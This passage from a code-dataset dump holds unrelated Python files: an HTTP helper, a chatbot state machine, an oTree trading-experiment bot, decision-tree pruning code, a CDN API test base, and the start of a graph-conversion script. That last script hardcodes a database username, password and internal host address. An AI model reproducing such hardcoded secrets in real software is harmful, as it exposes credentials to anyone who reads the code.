data=None, headers=None):\n if data is None:\n response = requests.get(url, headers=headers, params=parameters)\n else:\n response = requests.post(url, headers=headers, data=data, params=parameters)\n return response","sub_path":"src/http/invoke.py","file_name":"invoke.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"618318459","text":"import importlib\nfrom Entity import Entity\nfrom enum import Enum\nfrom collections import OrderedDict\n\nclass State(Enum):\n init = 1\n waitForAnswer = 2\n waitForConfirm = 3\n confirmed = 4\n\nclass BusinessCase:\n def __init__(self, config):\n self.name = config[\"name\"]\n self.intent = config[\"intent\"]\n entities = [Entity(e) for e in config[\"entities\"]] if \"entities\" in config else []\n self.entities = OrderedDict()\n for e in entities:\n self.entities[e.name] = e\n if \"businessLogic\" in config:\n module = importlib.import_module(\"BusinessLogic.\" + config[\"businessLogic\"])\n self.businessLogic = getattr(module, config[\"businessLogic\"])()\n else:\n self.businessLogic=None\n self.confirmationPhrase = config[\"confirmationPhrase\"] if \"confirmationPhrase\" in config else None\n self.openingQuestion = config[\"openingQuestion\"]\n self.state = State.init\n self.currentEntity = None\n if \"extractor\" in config:\n module = importlib.import_module(\"EntityExtractors.\" + config[\"extractor\"])\n self.extractor = getattr(module, config[\"extractor\"])()\n else:\n self.extractor = None\n\n def processMessage(self, message, clientId, attachments):\n if self.state is State.init:\n if self.extractor:\n self.state = State.waitForAnswer\n else:\n self.state = State.confirmed\n return self.openingQuestion\n elif self.state is State.waitForAnswer:\n self.extractEntities(message, attachments)\n self.currentEntity = self.getNextEmptyEntity()\n\n if not self.currentEntity:\n if not self.confirmationPhrase:\n self.state=State.confirmed\n else:\n self.state = State.waitForConfirm\n return self.businessLogic.processEntities(self.entities.values())\n else:\n self.state = State.waitForAnswer\n return self.currentEntity.question\n\n elif self.state is State.waitForConfirm:\n self.state = State.confirmed\n return self.confirmationPhrase\n\n\n def extractEntities(self, message, attachments):\n if attachments:\n for attachment in attachments:\n emptyEntities = self.getEmptyEntities()\n if self.currentEntity and self.currentEntity.extractor:\n matchesForEntityExtractor = self.currentEntity.extractor.extractFromImage(attachment, emptyEntities, self.currentEntity)\n for match in matchesForEntityExtractor:\n self.entities[match.name].value = match.value\n self.entities[match.name].confidence = match.confidence\n emptyEntities = self.getEmptyEntities()\n\n matches = self.extractor.extractFromImage(attachment, emptyEntities, self.currentEntity)\n for match in matches:\n self.entities[match.name].value = match.value\n self.entities[match.name].confidence = match.confidence\n\n if message:\n emptyEntities = self.getEmptyEntities()\n if self.currentEntity and self.currentEntity.extractor:\n matchesForEntityExtractor = self.currentEntity.extractor.extractFromText(message, emptyEntities,\n self.currentEntity)\n for match in matchesForEntityExtractor:\n self.entities[match.name].value = match.value\n self.entities[match.name].confidence = match.confidence\n emptyEntities = self.getEmptyEntities()\n \n matches = self.extractor.extractFromText(message, emptyEntities, 
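For context, here is how invoke_function above dispatches: passing only parameters takes the GET branch, while any data switches to POST. The URL below is a placeholder, not a real endpoint.

```python
# Hypothetical calls against the invoke_function helper defined above.
url = 'https://example.com/function'                       # placeholder endpoint
get_resp = invoke_function(url, parameters={'q': 'scar'})  # data is None -> GET
post_resp = invoke_function(url, data=b'payload')          # data given   -> POST
print(get_resp.status_code, post_resp.status_code)
```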
self.currentEntity)\n\n for match in matches:\n self.entities[match.name].value = match.value\n self.entities[match.name].confidence = match.confidence\n\n\n def getNextEmptyEntity(self):\n if not self.entities:\n return None\n for entity in self.entities.values():\n if not entity.value:\n return entity\n return None\n\n def getEmptyEntities(self):\n if not self.entities:\n return None\n entities = []\n for entity in self.entities.values():\n if not entity.value:\n entities.append(entity.name)\n return entities","sub_path":"servers/ChatbotServer/Chatbot/BusinessCase.py","file_name":"BusinessCase.py","file_ext":"py","file_size_in_byte":4548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"206085813","text":"from otree.api import Currency as c, currency_range\nimport pandas as pd\nimport numpy as np\nimport datetime\nimport random\nimport pickle\n\n\nclass Participant():\n def __init__(self):\n self.vars = {'group': None}\n self.payoff = c(0)\n\n\nclass Constants():\n trade_good = 'Bien de Consumo'\n\n\nclass Round():\n def __init__(self):\n self.role_pre = None\n self.other_role_pre = None\n self.token_color = None\n self.other_token_color = None\n self.group_color = None\n self.other_group_color=None\n self.trade_attempted = None\n self.trade_succeeded = None\n self.payoff = None\n self.cumulative_payoff = None\n\n def over(self):\n if all(vars(self).values()):\n return True\n return False\n\n def __str__(self):\n return f'role pre: {self.role_pre}\\n' + \\\n f'other role pre: {self.other_role_pre}\\n' + \\\n f'token color: {self.token_color}\\n' + \\\n f'other token color: {self.other_token_color}\\n' + \\\n f'group color: {self.group_color}\\n' + \\\n f'other group_color: {self.other_group_color}\\n' + \\\n f'trade attempted: {self.trade_attempted}\\n' + \\\n f'trade succeeded: {self.trade_succeeded}\\n' + \\\n f'payoff: {self.payoff}\\n' + \\\n f'cumulative payoff: {self.cumulative_payoff}\\n'\n\n\nclass AutomatedTrader():\n def __init__(self, session, id_in_group, num_rounds, players_per_group):\n self.participant = Participant()\n self.__round_data = [Round() for i in range(num_rounds)]\n self.session = session\n self.id_in_group = id_in_group\n self.round_number = 0\n self.players_per_group = players_per_group\n\n def dump_round_data(self):\n id_in_session = (self.id_in_group - 1) + (self.players_per_group * self.participant.vars['group'])\n fname = f'{self.session.code}_{id_in_session}.pkl' \n with open(fname, 'wb') as f:\n pickle.dump(self.__round_data, f)\n \n def load_round_data(self):\n id_in_session = (self.id_in_group - 1) + (self.players_per_group * self.participant.vars['group'])\n fname = f'{self.session.code}_{id_in_session}.pkl' \n with open(fname, 'rb') as f:\n self.__round_data = pickle.load(f)\n\n def export_data(self):\n cols = ['participant.id_in_session',\n 'participant.payoff',\n 'participant.is_automated',\n 'player.id_in_group',\n 'player.role_pre',\n 'player.other_role_pre',\n 'player.token_color',\n 'player.other_token_color',\n 'player.group_color',\n 'player.other_group_color',\n 'player.trade_attempted',\n 'player.trade_succeeded',\n 'player.payoff',\n 'group.id_in_subsession',\n 'subsession.round_number',\n 'session.code',\n ]\n\n df = {}\n self.load_round_data()\n n = len(self.__round_data)\n id_in_session = (self.id_in_group - 1) + (self.players_per_group * self.participant.vars['group'])\n df[cols[0]] = np.full(n, id_in_session)\n df[cols[1]] = np.array([r.cumulative_payoff if r.cumulative_payoff != 
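The getNextEmptyEntity/getEmptyEntities pair above implements a simple slot-filling loop over an OrderedDict. Here is a stripped-down sketch of that pattern, with toy dict entities standing in for the Entity class.

```python
from collections import OrderedDict

# Toy stand-ins for Entity objects: ask questions in insertion order
# until every slot has a value.
entities = OrderedDict()
entities['date'] = {'value': None, 'question': 'When?'}
entities['city'] = {'value': None, 'question': 'Where?'}

def next_empty(entities):
    for name, ent in entities.items():
        if not ent['value']:
            return name, ent
    return None, None

name, ent = next_empty(entities)
print(name, ent['question'])   # -> date When?
```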
None\\\n else 0* self.session.config['soles_per_ecu'] for r in self.__round_data])\n df[cols[2]] = np.full(n, 1)\n df[cols[3]] = np.full(n, self.id_in_group + 1)\n df[cols[4]] = np.array([r.role_pre for r in self.__round_data])\n df[cols[5]] = np.array([r.other_role_pre for r in self.__round_data])\n df[cols[6]] = np.array([r.token_color for r in self.__round_data])\n df[cols[7]] = np.array([r.other_token_color for r in self.__round_data])\n df[cols[8]] = np.array([r.group_color for r in self.__round_data])\n df[cols[9]] = np.array([r.other_group_color for r in self.__round_data])\n df[cols[10]] = np.array([r.trade_attempted for r in self.__round_data])\n df[cols[11]] = np.array([r.trade_succeeded for r in self.__round_data])\n df[cols[12]] = np.array([r.payoff for r in self.__round_data])\n df[cols[13]] = np.full(n, self.participant.vars['group'] + 1)\n df[cols[14]] = np.array([i for i in range(1, n + 1)])\n df[cols[15]] = np.full(n, self.session.code)\n df = pd.DataFrame(df)\n date = datetime.datetime.now().strftime('%Y-%m-%d')\n df.to_csv(f'dedollarization_{date}_session_{self.session.code}_automated_trader_{id_in_session}.csv')\n\n def trade(self, subsession):\n self.load_round_data()\n self.round_number = subsession.round_number - 1\n # self.session.vars['pairs'] is a list of rounds.\n # each round is a dict of (group,id):(group,id) pairs.\n group_id = self.participant.vars['group']\n player_groups = subsession.get_groups()\n bot_groups = self.session.vars['automated_traders']\n # gets a another pair\n # the other pair is the pair that is paired with the current player\n other_group, other_id = self.session.vars['pairs'][self.round_number][\n (group_id, self.id_in_group - 1)]\n if other_group < len(player_groups):\n other_player = player_groups[other_group].get_player_by_id(other_id + 1)\n else:\n other_player = bot_groups[(other_group, other_id)]\n\n # whatever color token they were assigned in models.py\n self.token_color = self.participant.vars['token']\n self.other_token_color = other_player.participant.vars['token']\n\n # defining roles as in models.py\n # ensuring opposites, such that half are producers and half are consumers\n self.role_pre = 'Consumer' if self.participant.vars['token'] != Constants.trade_good else 'Producer'\n self.other_role_pre = 'Consumer' if self.other_token_color != Constants.trade_good else 'Producer'\n\n # defining group color as in models.py\n self.group_color = self.participant.vars['group_color']\n self.other_group_color = other_player.participant.vars['group_color']\n\n #assert (self.token_color != None)\n #assert (self.other_token_color != None)\n #assert (self.role_pre != None)\n #assert (self.other_role_pre != None)\n #assert (self.group_color != None)\n #assert (self.other_group_color != None)\n\n # logic for whether you trade or not. 
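export_data above turns per-round records into parallel NumPy columns before writing a CSV. The same idea in miniature, with hypothetical column names:

```python
import numpy as np
import pandas as pd

# Per-round records -> column arrays -> DataFrame -> CSV (toy version of export_data).
rounds = [{'payoff': 1.0, 'trade': True}, {'payoff': 0.0, 'trade': False}]
df = pd.DataFrame({
    'player.payoff': np.array([r['payoff'] for r in rounds]),
    'player.trade_succeeded': np.array([r['trade'] for r in rounds]),
    'subsession.round_number': np.arange(1, len(rounds) + 1),
})
df.to_csv('toy_export.csv', index=False)
```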
\n if self.role_pre == self.other_role_pre:\n self.trade_attempted = False\n else:\n\n ### TREATMENT: BOTS ONLY ACCEPT THEIR OWN COLOR\n\n # if \"bots only trading the same color (blue)\" treatment is on\n if self.session.config['bots_trade_same_color']:\n\n # BOT is \"self\": if the other token is blue, then trade\n if self.other_token_color == self.group_color \\\n or self.role_pre == 'Consumer':\n self.trade_attempted = True\n\n # if not, then don't\n else:\n self.trade_attempted = False\n\n # if \"bots only trading the same color (blue)\" treatment is off\n # then just always trade\n else:\n self.trade_attempted = True\n self.dump_round_data()\n print(f'Round {self.round_number}, bot {self.id_in_group}, END OF TRADE\\n{self.__round_data[self.round_number]}')\n\n def compute_results(self, subsession, reward):\n self.load_round_data()\n self.round_number = subsession.round_number - 1\n if self.trade_attempted == None:\n self.trade(subsession)\n group_id = self.participant.vars['group'] \n player_groups = subsession.get_groups()\n bot_groups = self.session.vars['automated_traders']\n \n # identify trading partner\n # similar to above in Trade()\n other_group, other_id = self.session.vars['pairs'][self.round_number][\n (group_id, self.id_in_group - 1)]\n \n # get other player object\n if other_group < len(player_groups):\n other_player = player_groups[other_group].get_player_by_id(other_id + 1)\n else:\n other_player = bot_groups[(other_group, other_id)]\n other_player.load_round_data()\n other_player.round_number = self.round_number\n # define initial round payoffs\n round_payoff = c(0)\n\n # logic for switching objects on trade\n # if both players attempted a trade, it must be true\n # that one is a producer and one is a consumer.\n # Only 1 player performs the switch\n if self.trade_attempted and other_player.trade_attempted:\n # only 1 player actually switches the goods\n if self.trade_succeeded is None:\n # switch tokens\n self.participant.vars['token'] = self.other_token_color\n other_player.participant.vars['token'] = self.token_color\n # set players' trade_succeeded field\n self.trade_succeeded = True\n other_player.trade_succeeded = True\n if other_group > len(player_groups):\n other_player.store_round_data()\n\n ### TREATMENT: TAX ON FOREIGN (OPPOSITE) CURRENCY\n\n # if the player is the consumer, apply consumer tax to them\n # and apply producer tax to other player\n\n # FOREIGN TRANSACTION:\n # both parties the same group color\n if self.role_pre == 'Consumer':\n tax_consumer = c(0)\n if self.token_color != self.other_group_color and \\\n self.group_color == self.other_group_color:\n tax_consumer += self.session.config['foreign_tax'] \\\n * self.session.config['percent_foreign_tax_consumer']\n round_payoff += reward - tax_consumer\n\n # else if the player is the consumer, opposite\n else:\n tax_producer = c(0)\n if self.group_color != self.other_token_color and \\\n self.group_color == self.other_group_color:\n tax_producer += self.session.config['foreign_tax'] \\\n * self.session.config['percent_foreign_tax_producer']\n round_payoff -= tax_producer\n \n else:\n self.trade_succeeded = False\n assert(self.trade_succeeded is not None)\n # penalties for self\n # if your token matches your group color\n\n # TOKEN STORE COST:\n # if token held for a round = if trade did not succeed\n # homo: token is your color\n # hetero: token is different color\n if not self.trade_succeeded:\n if self.participant.vars['token'] == self.participant.vars['group_color']:\n round_payoff -= 
c(self.session.config['token_store_cost_homogeneous'])\n\n # if your token matches the opposite group color\n elif self.participant.vars['token'] != Constants.trade_good:\n round_payoff -= c(self.session.config['token_store_cost_heterogeneous'])\n\n # set payoffs\n self.set_payoffs(round_payoff)\n self.dump_round_data()\n print(f'Round {self.round_number}, bot {self.id_in_group}, END OF RESULTS\\n{self.__round_data[self.round_number]}')\n \n def set_payoffs(self, round_payoff):\n self.payoff = round_payoff\n\n @property\n def payoff(self):\n r = self.__round_data[self.round_number]\n return r.payoff\n\n @payoff.setter\n def payoff(self, v):\n r = self.__round_data[self.round_number]\n r.payoff = v\n self.participant.payoff += v\n r.cumulative_payoff = self.participant.payoff\n \n \n def in_round(self, n):\n return self.__round_data[n - 1]\n\n @property\n def role_pre(self):\n r = self.__round_data[self.round_number]\n return r.role_pre\n\n @role_pre.setter\n def role_pre(self, v):\n r = self.__round_data[self.round_number]\n r.role_pre = v\n\n @property\n def other_role_pre(self):\n r = self.__round_data[self.round_number]\n return r.other_role_pre\n\n @other_role_pre.setter\n def other_role_pre(self, v):\n r = self.__round_data[self.round_number]\n r.other_role_pre = v\n \n @property\n def token_color(self):\n r = self.__round_data[self.round_number]\n return r.token_color\n\n @token_color.setter\n def token_color(self, v):\n r = self.__round_data[self.round_number]\n r.token_color = v\n\n @property\n def other_token_color(self):\n r = self.__round_data[self.round_number]\n return r.other_token_color\n\n @other_token_color.setter\n def other_token_color(self, v):\n r = self.__round_data[self.round_number]\n r.other_token_color = v\n\n @property\n def group_color(self):\n r = self.__round_data[self.round_number]\n return r.group_color\n\n @group_color.setter\n def group_color(self, v):\n r = self.__round_data[self.round_number]\n r.group_color = v\n\n @property\n def other_group_color(self):\n r = self.__round_data[self.round_number]\n return r.other_group_color\n\n @other_group_color.setter\n def other_group_color(self, v):\n r = self.__round_data[self.round_number]\n r.other_group_color = v\n\n @property\n def trade_attempted(self):\n r = self.__round_data[self.round_number]\n return r.trade_attempted\n\n @trade_attempted.setter\n def trade_attempted(self, v):\n r = self.__round_data[self.round_number]\n r.trade_attempted = v\n\n @property\n def trade_succeeded(self):\n r = self.__round_data[self.round_number]\n return r.trade_succeeded\n\n @trade_succeeded.setter\n def trade_succeeded(self, v):\n r = self.__round_data[self.round_number]\n r.trade_succeeded = v\n\n","sub_path":"automated_trader.py","file_name":"automated_trader.py","file_ext":"py","file_size_in_byte":14008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"620307295","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Nov 5 12:24:13 2017\n\n@author: marti\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport pickle\nfrom Node import Node\nimport copy\nimport pydotplus as pydot\nimport os\nos.environ[\"PATH\"] += os.pathsep + 'C:/Program Files (x86)/Graphviz2.38/bin/'\n\ndef correct_labeled(x, node, current_node, passed_node = False) : # gives -1 if example doesnt pass current_node,\n \n if(node == current_node): # and 1/0 for the respective class the example fits to\n passed_node = True # If it passed the node at some point, the example will be added later\n 
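Every attribute on AutomatedTrader above is a property pair that proxies into the current round's record; that indirection is the whole trick. Shown here on a single field, with a plain dict in place of the Round class:

```python
# Sketch of the per-round property pattern used by AutomatedTrader.
class Rounds:
    def __init__(self, n):
        self._data = [{'payoff': None} for _ in range(n)]
        self.round_number = 0          # which round the proxies read/write

    @property
    def payoff(self):
        return self._data[self.round_number]['payoff']

    @payoff.setter
    def payoff(self, value):
        self._data[self.round_number]['payoff'] = value

r = Rounds(3)
r.payoff = 5                           # writes into round 0
r.round_number = 1
print(r.payoff, r._data[0]['payoff'])  # -> None 5
```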
if(node.leaf):\n if(passed_node == False):\n return -1\n if(x.class_label == node.label):\n return 1\n else:\n return 0\n else:\n \n \n value = getattr(x, node.split_attr)\n if ( value <= node.split_value):\n return correct_labeled(x, node.left, current_node, passed_node) \n else:\n return correct_labeled(x, node.right, current_node, passed_node)\n \n \ndef compute_acc(correct, total_len): # compute accuracy from respective node\n if total_len == 0: accuracy = 1\n else: accuracy = correct / total_len\n return accuracy\n \ndef compute_prun_acc(labels, total_len): # computes acuracy when node is a leafnode and fitting class\n if total_len == 0:\n prun_accuracy = 1\n else:\n prun_accuracy = labels / total_len \n \n if prun_accuracy < 0.5: # prun accuracy counts the labels of 1 or 0\n prun_accuracy = 1 - prun_accuracy\n prun_class = 0 # class after pruning\n else: prun_class = 1\n return prun_accuracy, prun_class\n \ndef compute_accuracys(current_node):\n iter_csv = CSV.itertuples() #brings fitting format of one example\n correct = 0.\n labels = 0.\n prun_class = 1 \n \n total_len = float(len(CSV)) # total length of all examples\n\n for x in iter_csv:\n i= correct_labeled(x, TREE, current_node) # i says if the label was correct\n if i == -1: # -1 means x didnt pass node\n total_len -= 1 # than the total size should shrink by one because this sample is not viewed\n else:\n labels += x.class_label\n correct += i\n \n acc = compute_acc(correct, total_len)\n prun_acc, prun_class = compute_prun_acc(labels, total_len)\n\n return acc, prun_acc, prun_class \n\ndef make_node_to_leaf(node, prun_class):\n node.left = None\n node.right = None\n node.leaf = True\n node.label = prun_class\n \ndef graphstuff(node, gparent, nparent, graph): \n global nodenr\n \n if (node.leaf):\n g_node = pydot.Node(nodenr, shape = \"oval\", label= node.label , style=\"solid\", fillcolor=\"red\")\n else:\n g_node = pydot.Node(nodenr, shape = \"box\", label= node.label , style=\"solid\", fillcolor=\"red\")\n graph.add_node(g_node)\n if gparent != None:\n if (nparent.left == node):\n graph.add_edge(pydot.Edge(gparent, g_node, label = \"True\"))\n else:\n graph.add_edge(pydot.Edge(gparent, g_node, label = \"False\"))\n nodenr += 1 \n return g_node\n\ndef pruning(node):\n accuracy, prun_accuracy , prun_class = compute_accuracys(node)\n #print(accuracy, prun_accuracy)\n # ToDo make new node and substitude old one\n if prun_accuracy >= accuracy:\n make_node_to_leaf(node, prun_class)\n print(\"pruned\")\n \ndef post_order_traversal(node):\n if(node.leaf): return\n post_order_traversal(node.left)\n post_order_traversal(node.right)\n pruning(node)\n \ndef graphstuff(node, gparent, nparent): \n global nodenr\n \n if (node.leaf):\n g_node = pydot.Node(nodenr, shape = \"oval\", label= node.label , style=\"solid\", fillcolor=\"red\")\n else:\n g_node = pydot.Node(nodenr, shape = \"box\", label= node.label , style=\"solid\", fillcolor=\"red\")\n GRAPH.add_node(g_node)\n if gparent != None:\n if (nparent.left == node):\n GRAPH.add_edge(pydot.Edge(gparent, g_node, label = \"True\"))\n else:\n GRAPH.add_edge(pydot.Edge(gparent, g_node, label = \"False\"))\n\n nodenr += 1 \n return g_node\n \ndef pre_order_traversal(node, g_parent, n_parent):\n if node == None: return\n g_node = graphstuff(node, g_parent, n_parent)\n pre_order_traversal(node.left, g_node, node)\n pre_order_traversal(node.right, g_node, node)\n\n\ndef prune_heuristicly(graphNameToPrune, newGraphName, csv):\n global CSV\n global TREE\n global nodenr\n global GRAPH \n\n nodenr = 
0\n GRAPH = pydot.Dot(graph_type='graph')\n\n \n CSV = csv\n TREE = pickle.load( open(graphNameToPrune + \".p\", \"rb\") )\n post_order_traversal(TREE)\n pre_order_traversal(TREE, None, None)\n\n\n pickle.dump(TREE, open(newGraphName + \".p\", \"wb\"))\n GRAPH.write_png(newGraphName + '.png')\n GRAPH.write_dot(newGraphName + '.dot')\n\nCSV = 0\nTREE = 0\nnodenr = 0\nGRAPH = 0\n ","sub_path":"ML_Ass_1_Python27/Pruning_heuristic.py","file_name":"Pruning_heuristic.py","file_ext":"py","file_size_in_byte":5002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"528922363","text":"# Copyright (c) 2014 Rackspace, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport random\nimport string\nimport uuid\n\nfrom cafe.drivers.unittest import fixtures\nimport jsonschema\n\nfrom tests.api.utils import client\nfrom tests.api.utils import config\n\n\nclass TestBase(fixtures.BaseTestFixture):\n\n \"\"\"Child class of fixtures.BaseTestFixture for testing CDN.\n\n Inherit from this and write your test methods. If the child class defines\n a prepare(self) method, this method will be called before executing each\n test method.\n \"\"\"\n\n @classmethod\n def setUpClass(cls):\n\n super(TestBase, cls).setUpClass()\n\n import requests.packages.urllib3\n requests.packages.urllib3.disable_warnings()\n\n cls.auth_config = config.AuthConfig()\n if cls.auth_config.auth_enabled:\n cls.auth_client = client.AuthClient()\n auth_token, cls.user_project_id = \\\n cls.auth_client.authenticate_user(\n cls.auth_config.base_url,\n cls.auth_config.user_name,\n cls.auth_config.api_key,\n cls.auth_config.password)\n else:\n auth_token = str(uuid.uuid4())\n cls.user_project_id = str(uuid.uuid4())\n\n cls.test_config = config.TestConfig()\n\n cls.config = config.PoppyConfig()\n if cls.test_config.project_id_in_url:\n cls.url = cls.config.base_url + '/v1.0/' + cls.user_project_id\n else:\n cls.url = cls.config.base_url + '/v1.0'\n\n cls.client = client.PoppyClient(cls.url, auth_token,\n cls.user_project_id,\n serialize_format='json',\n deserialize_format='json')\n\n if cls.auth_config.multi_user:\n alt_auth_token, alt_project_id = cls.auth_client.authenticate_user(\n cls.auth_config.base_url,\n cls.auth_config.alt_user_name,\n cls.auth_config.alt_api_key)\n if cls.test_config.project_id_in_url:\n alt_url = cls.config.base_url + '/v1.0/' + alt_project_id\n else:\n alt_url = cls.config.base_url + '/v1.0'\n\n cls.alt_user_client = client.PoppyClient(\n alt_url, alt_auth_token,\n alt_project_id,\n serialize_format='json',\n deserialize_format='json')\n\n service_limit_auth_token, service_limit_project_id = \\\n cls.auth_client.authenticate_user(\n cls.auth_config.base_url,\n cls.auth_config.service_limit_user_name,\n cls.auth_config.service_limit_api_key)\n if cls.test_config.project_id_in_url:\n service_limit_url = cls.config.base_url \\\n + '/v1.0/' + service_limit_project_id\n else:\n service_limit_url = cls.config.base_url + '/v1.0'\n\n cls.service_limit_user_client = 
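The pruning decision above boils down to one comparison: replace a subtree with a majority-class leaf whenever the leaf's accuracy on the examples reaching that node is at least the subtree's accuracy. Isolated as a function, with illustrative numbers:

```python
# The reduced-error pruning test in isolation (numbers are illustrative).
def should_prune(subtree_correct, majority_count, total):
    if total == 0:
        return True                     # no examples reach the node: prune
    subtree_acc = subtree_correct / total
    leaf_acc = max(majority_count, total - majority_count) / total
    return leaf_acc >= subtree_acc

print(should_prune(7, 8, 10))           # leaf 0.8 >= subtree 0.7 -> True
```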
client.PoppyClient(\n service_limit_url, service_limit_auth_token,\n service_limit_project_id,\n serialize_format='json',\n deserialize_format='json')\n if cls.test_config.run_operator_tests:\n operator_auth_token, operator_project_id = \\\n cls.auth_client.authenticate_user(\n cls.auth_config.base_url,\n cls.auth_config.operator_user_name,\n cls.auth_config.operator_api_key)\n if cls.test_config.project_id_in_url:\n cls.operator_url = cls.config.base_url + '/v1.0/' + \\\n operator_project_id\n else:\n cls.operator_url = cls.config.base_url + '/v1.0'\n\n cls.operator_client = client.PoppyClient(\n cls.operator_url, operator_auth_token, operator_project_id,\n serialize_format='json',\n deserialize_format='json')\n\n cls.dns_config = config.DNSConfig()\n cls.shared_ssl_num_shards = cls.dns_config.shared_ssl_num_shards\n cls.dns_client = client.DNSClient(cls.dns_config.dns_username,\n cls.dns_config.dns_api_key)\n\n cls.akamai_config = config.AkamaiConfig()\n\n def generate_random_string(self, prefix='API-Tests', length=12):\n \"\"\"Generates a random string of given prefix & length\"\"\"\n random_string = ''.join(random.choice(\n string.ascii_lowercase + string.digits)\n for _ in range(length))\n random_string = prefix + random_string\n return random_string\n\n def assertSchema(self, response_json, expected_schema):\n \"\"\"Verify response schema aligns with the expected schema.\"\"\"\n try:\n jsonschema.validate(response_json, expected_schema)\n except jsonschema.ValidationError as message:\n assert False, message\n\n @property\n def test_flavor(self):\n if self.test_config.generate_flavors:\n provider_name = self.test_config.generated_provider\n # create the flavor\n flavor_id = str(uuid.uuid1())\n self.client.create_flavor(\n flavor_id=flavor_id,\n provider_list=[{\n \"provider\": provider_name,\n \"links\": [{\"href\": \"www.{0}.com\".format(provider_name),\n \"rel\": \"provider_url\"}]}])\n else:\n flavor_id = self.test_config.default_flavor\n\n return flavor_id\n\n def setup_service(self, service_name, domain_list, origin_list,\n caching_list=[], restrictions_list=[], flavor_id=None,\n log_delivery=False):\n resp = self.client.create_service(\n service_name=service_name,\n domain_list=domain_list,\n origin_list=origin_list,\n caching_list=caching_list,\n restrictions_list=restrictions_list,\n flavor_id=flavor_id,\n log_delivery=log_delivery)\n\n self.assertEqual(resp.status_code, 202, msg=resp.text)\n self.service_location = resp.headers['location']\n self.client.wait_for_service_status(\n location=self.service_location,\n status='DEPLOYED',\n abort_on_status='FAILED',\n retry_interval=self.test_config.status_check_retry_interval,\n retry_timeout=self.test_config.status_check_retry_timeout)\n\n return resp\n\n def _service_limit_create_test_service(self, client, resp_code=False):\n service_name = str(uuid.uuid1())\n\n domain_list = [{\"domain\": self.generate_random_string(\n prefix='www.api-test-domain') + '.com'}]\n\n origin_list = [{\"origin\": self.generate_random_string(\n prefix='api-test-origin') + '.com', \"port\": 80, \"ssl\": False,\n \"hostheadertype\": \"custom\", \"hostheadervalue\":\n \"www.customweb.com\"}]\n caching_list = [\n {\n u\"name\": u\"default\",\n u\"ttl\": 3600,\n u\"rules\": [{\n u\"name\": \"default\",\n u\"request_url\": \"/*\"\n }]\n },\n {\n u\"name\": u\"home\",\n u\"ttl\": 1200,\n u\"rules\": [{\n u\"name\": u\"index\",\n u\"request_url\": u\"/index.htm\"\n }]\n }\n ]\n log_delivery = {\"enabled\": False}\n\n resp = client.create_service(\n 
service_name=service_name,\n domain_list=domain_list,\n origin_list=origin_list,\n caching_list=caching_list,\n flavor_id=self.flavor_id,\n log_delivery=log_delivery)\n\n if resp_code:\n return resp\n\n self.assertEqual(resp.status_code, 202)\n service_url = resp.headers[\"location\"]\n client.wait_for_service_status(\n location=service_url,\n status='DEPLOYED',\n abort_on_status='FAILED',\n retry_interval=self.test_config.status_check_retry_interval,\n retry_timeout=self.test_config.status_check_retry_timeout)\n\n return service_url\n\n def assert_patch_service_details(self, actual_response, expected_response):\n self.assertEqual(actual_response['name'],\n expected_response['name'])\n self.assertEqual(sorted(actual_response['origins']),\n sorted(expected_response['origins']))\n self.assertEqual(sorted(actual_response['caching']),\n sorted(expected_response['caching']))\n self.assertEqual(sorted(actual_response['restrictions']),\n sorted(expected_response['restrictions']))\n self.assertEqual(actual_response['flavor_id'],\n expected_response['flavor_id'])\n\n for item in actual_response['domains']:\n if item['protocol'] == 'https':\n matched_domain_in_body = next(b_item for b_item\n in expected_response['domains']\n if (\n b_item['domain'] ==\n item['domain'])\n or (b_item.get('certificate') ==\n 'shared' and\n item['domain'].split('.')[0]\n == b_item['domain']))\n if item['certificate'] == 'shared':\n matched_domain_in_body['domain'] = item['domain']\n matched_domain_in_body[\"certificate_status\"] = (\n item[\"certificate_status\"])\n self.assertEqual(sorted(actual_response['domains']),\n sorted(expected_response['domains']))\n\n @classmethod\n def tearDownClass(cls):\n \"\"\"Deletes the added resources.\"\"\"\n super(TestBase, cls).tearDownClass()\n","sub_path":"tests/api/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":10651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"645122759","text":"from Database_conductor import *\ndir_path = './'\n\nimport re\nimport os\ndef remove_control_characters(html):\n def str_to_int(s, default, base=10):\n if int(s, base) < 0x10000:\n return chr(int(s, base))\n return default\n html = re.sub(u\"&#(\\d+);?\", lambda c: str_to_int(c.group(1), c.group(0)), html)\n html = re.sub(u\"&#[xX]([0-9a-fA-F]+);?\", lambda c: str_to_int(c.group(1), c.group(0), base=16), html)\n html = re.sub(u\"[\\x00-\\x08\\x0b\\x0e-\\x1f\\x7f]\", \"\", html)\n return html\n\ndef convert(team_name, channels_list, graph='mention_based_graph_info', user='read_database', pwd='FluoBySusTech',\n port=3306, host='10.20.13.209', dbname='rowdata'):\n if os.path.isfile(dir_path + \"/mention_based/{}_{}.gexf\".format(team_name, channels_list[0])):\n return\n\n from gexf import Gexf\n from textblob import TextBlob\n import random\n import pymysql\n import pandas as pd\n import networkx as nx\n\n database_conductor = Database_conductor(True)\n\n gexf_dict = dict()\n\n try:\n con = pymysql.Connect(host=host, port=port, user=user, passwd=pwd, db=dbname)\n cur = con.cursor()\n except pymysql.Error as e:\n print(\"Error %d: %s\" % (e.args[0], e.args[1]))\n\n cur.execute('select id,name from people')\n people_id = cur.fetchall()\n people_id = dict(people_id)\n\n cur.execute('select * from team_channel_relation ')\n team_to_channel = cur.fetchall()\n team_to_channel = list(map(list, zip(*team_to_channel)))\n team = team_to_channel[0][:]\n channel = team_to_channel[1][:]\n team_to_channel = {'team': team, 'channel': 
